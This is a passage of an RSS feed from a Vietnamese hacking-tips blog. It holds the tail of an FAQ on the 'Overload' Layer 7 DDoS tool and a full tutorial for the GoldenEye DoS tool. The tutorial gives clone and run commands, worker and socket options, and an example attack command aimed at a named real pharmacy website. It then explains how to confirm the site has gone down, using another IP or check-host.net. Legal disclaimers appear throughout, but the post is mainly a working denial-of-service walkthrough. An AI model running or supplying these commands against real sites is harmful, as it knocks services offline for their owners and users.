<div class="gtx-trans-icon"></div>
</div>
<h2>Câu hỏi thường gặp</h2>
<h3>Overload là gì và nó hoạt động như thế nào?</h3>
<p>Overload là một công cụ đơn giản để thử nghiệm sức chịu tải của website bằng cách gửi nhiều yêu cầu HTTP.  Nó mô phỏng một cuộc tấn công DDoS Layer 7 ở mức độ nhẹ để đánh giá khả năng chịu đựng của website trước lượng truy cập lớn.</p>
<h3>Tôi có thể sử dụng Overload để tấn công website của người khác không?</h3>
<p>Không.  Việc sử dụng Overload để tấn công website mà bạn không sở hữu hoặc quản lý là bất hợp pháp và có thể dẫn đến hậu quả nghiêm trọng.  Chỉ sử dụng công cụ này để kiểm tra website của riêng bạn.</p>
<h3>Làm thế nào để bảo vệ website của tôi khỏi các cuộc tấn công DDoS?</h3>
<p>Bạn cần nâng cấp máy chủ và băng thông, tối ưu hóa mã nguồn, sử dụng tường lửa, và cân nhắc sử dụng các dịch vụ bảo vệ DDoS chuyên nghiệp.  Việc thường xuyên cập nhật bản vá lỗi bảo mật cũng rất quan trọng.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/cach-ddos-layer-7-bang-overload-thu-suc-chiu-tai-cua-website/feed/</wfw:commentRss>
			<slash:comments>4</slash:comments>
		
		
			</item>
		<item>
		<title>GoldenEye &#8211; Tool kiểm tra sức chịu đựng DOS của Website</title>
		<link>https://anonyviet.com/goldeneye-tool-kiem-tra-suc-chiu-dung-dos-cua-website/</link>
					<comments>https://anonyviet.com/goldeneye-tool-kiem-tra-suc-chiu-dung-dos-cua-website/#comments</comments>
		
		<dc:creator><![CDATA[Wdchocopie]]></dc:creator>
		<pubDate>Mon, 02 Aug 2021 02:11:49 +0000</pubDate>
				<category><![CDATA[DDOS]]></category>
		<category><![CDATA[goldeneye]]></category>
		<category><![CDATA[tấn công từ chối dịch vụ]]></category>
		<category><![CDATA[Đos]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=28942</guid>

					<description><![CDATA[GoldenEye là một Tool DoS đơn giản nhưng cực kỳ hiệu quả, thường được các quản trị Server dùng để kiểm tra sức chịu đựng của hệ thống khi bị DoS. Đặc điểm của GoldenEye là chỉ cần 1 IP, không dùng Proxy nhưng kết hợp với nhiều user againt tạo nên các luồng tấn [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>GoldenEye là một Tool DoS đơn giản nhưng cực kỳ hiệu quả, thường được các quản trị Server dùng để kiểm tra sức chịu đựng của hệ thống khi bị DoS. Đặc điểm của GoldenEye là chỉ cần 1 IP, không dùng Proxy nhưng kết hợp với nhiều user againt tạo nên các luồng tấn công vào Server khá mạng.</strong></p>
<p>Bạn có thể điều chỉnh số lượng kết nối DoS vào Server dựa trên tham số worker và socket. Từ đó có thể kiểm tra xem Web mình chịu tải được bao nhiêu.</p>
<h3>Dos / DDos là gì?</h3>
<p>Dos (viết tắt của Denial-of-service) là một dạng tấn công máy hoặc mạng, khiến cho chúng không còn khả năng sử dụng dựa theo nguyên lí của tắc nghẽn traffic hay vượt quá sức chịu đựng của 1 máy chủ hoặc mạng. Những đối tượng thường bị tấn công là những website , máy chủ server , mạng ,&#8230;.</p>
<ul>
<li><strong>GoldenEye</strong> tạo ra một lượng lớn truy cập cùng lúc vào Website khiến Server không chịu tải nổi dẫn đến Website sẽ ngưng hoạt động.</li>
<li>Dấu hiệu để biết Website bị sập hay chưa là người dùng không thể truy cập được Web hoặc hiển thị không thể kết nối đến database.</li>
</ul>
<p>Đối với Webmaster có thể <a href="https://anonyviet.com/script-tu-dong-khoi-dong-nginx-mariadb-php-khi-web-loi-502-bad-gateway/">dùng cronjob để kiểm tra thường xuyên Website có bị sập không</a>, nếu có thì tự khởi động lại các dịch vụ.</p>
<h3>1 số lưu ý trước khi thực hiện</h3>
<ul>
<li><span style="color: #0000ff;">Không DoS AnonyViet và các Website không phải của bạn quản lý</span></li>
<li>Những kiểu Dos này rất tốn tài nguyên máy tính, vì vậy hãy sử dụng cho vừa đủ và đừng để overload máy tính. Bài viết chỉ mang tính chất nghiên cứu vậy nên hãy sử dụng tool này như 1 tool test website bạn hay website bạn có thể tấn công chứ đừng phá hoại website người khác.</li>
</ul>
<h3>Chuẩn bị</h3>
<ul>
<li>Một máy tính chạy Linux (nếu chạy window có thể tải link <a href="https://github.com/jseidl/GoldenEye" target="_blank" rel="noopener">ở đây</a>)</li>
<li>Python3 (xem hướng dẫn tải cho window và linux)</li>
</ul>
<h3><strong>Hướng dẫn Dos website bằng GoldenEye</strong></h3>
<div class="alert alert-success"><span style="color: #ff0000;"><strong>Chú ý! Chỉ thực hiện Test DDOS trên Website hoặc Server của bạn làm chủ. Mọi hành vi DDOS vào Website của người khác hoặc tổ chức khác đều vi phạm pháp luật.</strong></span></div>
<p>Mở Terminal lên vào thực hiện các lệnh sau:</p>
<p><strong>Tải GoldenEye về máy tính</strong></p>
<p><code>git clone https://github.com/jseidl/GoldenEye</code></p>
<p><strong>Vào thư mục GoldenEye</strong></p>
<p><code>cd GoldenEye/</code></p>
<p><strong>Cú pháp câu lệnh</strong></p>
<p><code>python3 goldeneye.py &lt;url&gt; [tùy chọn]</code></p>
<p><strong>Tùy chọn :</strong><img decoding="async" class="alignnone size-full " src="https://anonyviet.com/wp-content/uploads/2021/07/3-1.jpg" alt="Dos GoldenEye" width="1102" height="255" title="GoldenEye - Tool kiểm tra sức chịu đựng DOS của Website 92"></p>
<ul>
<li> &#8211; u : useragent (mặc định: tự tạo</li>
<li> &#8211; w : worker (mặc định: 50)</li>
<li> &#8211; s : socket (mặc định: 30)</li>
<li> &#8211; m : method (post , get , random)</li>
<li> &#8211; d : debug (mặc định : false)</li>
<li> &#8211; n : nosslcheck (mặc định : true)</li>
<li> &#8211; h : help</li>
</ul>
<p>&nbsp;</p>
<p><strong>Ví dụ của bài :</strong></p>
<p><code>python3 goldeneye.py https://duocphamviethung.com.vn/ -w 1000 -s 1000 -m post</code></p>
<p>(Đây là trang của người quen nhờ Check giùm)</p>
<p><img decoding="async" class="alignnone size-full " src="https://anonyviet.com/wp-content/uploads/2021/07/2-1.jpg" alt="Dos GoldenEye" width="946" height="135" title="GoldenEye - Tool kiểm tra sức chịu đựng DOS của Website 93"></p>
<p>Khi GoldenEye thông báo như này là nó đã chạy rồi nhé</p>
<p>Và kết quả đây:</p>
<p><img decoding="async" class="alignnone size-full " src="https://anonyviet.com/wp-content/uploads/2021/07/4-2.jpg" alt="Dos GoldenEye ping" width="665" height="170" title="GoldenEye - Tool kiểm tra sức chịu đựng DOS của Website 94"></p>
<p>Một số Server cấu hình mạnh sẽ chặn IP của bạn, tốt nhất để biết Web sập hay chưa bạn nên dùng 1 IP khác để truy cập thử hoặc kiểm tra tại <a href="https://check-host.net/check-http?host=" target="_blank" rel="noopener">check-host.net</a>.</p>
<p><strong>Và đó là cách sử dụng GoldenEye để Dos website. Hãy để lại bình luận ở dưới để mình biết ý kiến của mọi người nhé. Hãy xem thêm bài viết MHDDoS &#8211; Tool DDOS Attack với 36 kiểu tấn công hot <a href="https://anonyviet.com/mhddos-tool-ddos-attack-voi-36-kieu-tan-cong/">tại đây.</a></strong></p>
<h2>Câu hỏi thường gặp</h2>
<h3>GoldenEye có an toàn khi sử dụng không?</h3>
<p>GoldenEye là công cụ để kiểm tra khả năng chịu tải của website.  Chỉ sử dụng GoldenEye trên website hoặc server mà bạn sở hữu.  Sử dụng GoldenEye trái phép có thể vi phạm pháp luật.</p>
<h3>Tôi cần những gì để sử dụng GoldenEye?</h3>
<p>Bạn cần một máy tính (Linux hoặc Windows), Python 3 được cài đặt và kết nối internet.</p>
<h3>Làm thế nào để tôi biết website đã bị tấn công thành công?</h3>
<p>Website sẽ không phản hồi hoặc hiển thị lỗi kết nối.  Bạn nên sử dụng một IP khác để kiểm tra hoặc sử dụng dịch vụ kiểm tra trạng thái website như check-host.net để xác nhận.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/goldeneye-tool-kiem-tra-suc-chiu-dung-dos-cua-website/feed/</wfw:commentRss>
			<slash:comments>2</slash:comments>
		
		
			</item>
	</channel>
</rss>
